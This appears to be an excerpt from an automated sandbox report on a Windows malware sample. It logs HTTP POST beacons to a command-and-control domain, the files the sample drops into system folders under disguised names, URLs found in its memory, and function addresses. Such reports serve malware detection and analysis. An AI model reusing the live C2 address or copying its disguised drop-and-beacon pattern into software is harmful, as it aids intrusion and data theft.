Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 114936cm.nyashcrack.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 114936cm.nyashcrack.top

Source: unknown

HTTP traffic detected: POST /EternalHttpprocessauthdbwordpressUploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 114936cm.nyashcrack.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:32:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:32:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:32:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:32:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:32:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:32:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:33:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:33:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:33:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:33:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:33:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 21:33:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: axnJvpyQnMRKSw.exe, 00000005.00000002.1866246178.000000000365E000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000005.00000002.1866246178.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000000E.00000002.1970943257.000000000321B000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000000E.00000002.1970943257.0000000003493000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2061665407.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2061665407.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2160444344.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2160444344.000000000310B000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2298356938.0000000003771000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2298356938.000000000399E000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2397277382.0000000003685000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2397277382.0000000003840000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2492111664.0000000003198000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2492111664.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2602835225.00000000038C3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2602835225.00000000036FE000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2710876780.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2710876780.00000000030C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://114936cm.nyashcrack.top
Source: axnJvpyQnMRKSw.exe, 00000039.00000002.2710876780.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://114936cm.nyashcrack.top/
Source: axnJvpyQnMRKSw.exe, 00000005.00000002.1866246178.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000000E.00000002.1970943257.000000000321B000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2121077957.000000001BDE0000.00000004.00000020.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2061665407.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2160444344.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2298356938.0000000003771000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2397277382.0000000003685000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2492111664.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2602835225.00000000036FE000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2710876780.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
Source: FuWRu2Mg82.exe, 00000000.00000002.1700201126.0000000003341000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000005.00000002.1866246178.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000000E.00000002.1970943257.000000000321B000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000014.00000002.2061665407.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000001A.00000002.2160444344.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000020.00000002.2298356938.0000000003771000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000026.00000002.2397277382.0000000003685000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 0000002C.00000002.2492111664.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000033.00000002.2602835225.00000000036FE000.00000004.00000800.00020000.00000000.sdmp, axnJvpyQnMRKSw.exe, 00000039.00000002.2710876780.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Web\ApplicationFrameHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Web\ApplicationFrameHost.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Web\6dd19aba3e2428	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Setup\State\axnJvpyQnMRKSw.exe	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Setup\State\axnJvpyQnMRKSw.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Setup\State\26853581233ef1	Jump to behavior

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Code function: 0_2_00007FFD9BA10D48	0_2_00007FFD9BA10D48
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Code function: 0_2_00007FFD9BA10E43	0_2_00007FFD9BA10E43
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	Code function: 0_2_00007FFD9C161A40	0_2_00007FFD9C161A40
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 5_2_00007FFD9BAC0D48	5_2_00007FFD9BAC0D48
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 5_2_00007FFD9BAC0E43	5_2_00007FFD9BAC0E43
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 5_2_00007FFD9C2116E0	5_2_00007FFD9C2116E0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 14_2_00007FFD9BAB0D48	14_2_00007FFD9BAB0D48
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 14_2_00007FFD9BAB0E43	14_2_00007FFD9BAB0E43
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 14_2_00007FFD9C201AA0	14_2_00007FFD9C201AA0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 20_2_00007FFD9BAA0D48	20_2_00007FFD9BAA0D48
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 20_2_00007FFD9BAA0E43	20_2_00007FFD9BAA0E43
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 20_2_00007FFD9C1F16E0	20_2_00007FFD9C1F16E0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BAD0C66	26_2_00007FFD9BAD0C66
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BAC0D48	26_2_00007FFD9BAC0D48
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BAC0E43	26_2_00007FFD9BAC0E43
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BAF9A7A	26_2_00007FFD9BAF9A7A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BAF1605	26_2_00007FFD9BAF1605
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BED10F2	26_2_00007FFD9BED10F2
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BED0EE0	26_2_00007FFD9BED0EE0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BED0E98	26_2_00007FFD9BED0E98
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BE912E0	26_2_00007FFD9BE912E0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9BE912CF	26_2_00007FFD9BE912CF
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9C22448F	26_2_00007FFD9C22448F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9C21ED7F	26_2_00007FFD9C21ED7F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9C22632F	26_2_00007FFD9C22632F
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9C231370	26_2_00007FFD9C231370
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 26_2_00007FFD9C2116E0	26_2_00007FFD9C2116E0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BAE9A7A	32_2_00007FFD9BAE9A7A
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BAE1605	32_2_00007FFD9BAE1605
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BAC0C66	32_2_00007FFD9BAC0C66
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BAB0D48	32_2_00007FFD9BAB0D48
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BAB0E43	32_2_00007FFD9BAB0E43
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BEC0EAF	32_2_00007FFD9BEC0EAF
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BEC0EE0	32_2_00007FFD9BEC0EE0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BE812CF	32_2_00007FFD9BE812CF
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9BE812E0	32_2_00007FFD9BE812E0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9C201AA0	32_2_00007FFD9C201AA0
Source: C:\Recovery\axnJvpyQnMRKSw.exe	Code function: 32_2_00007FFD9C222982	32_2_00007FFD9C222982
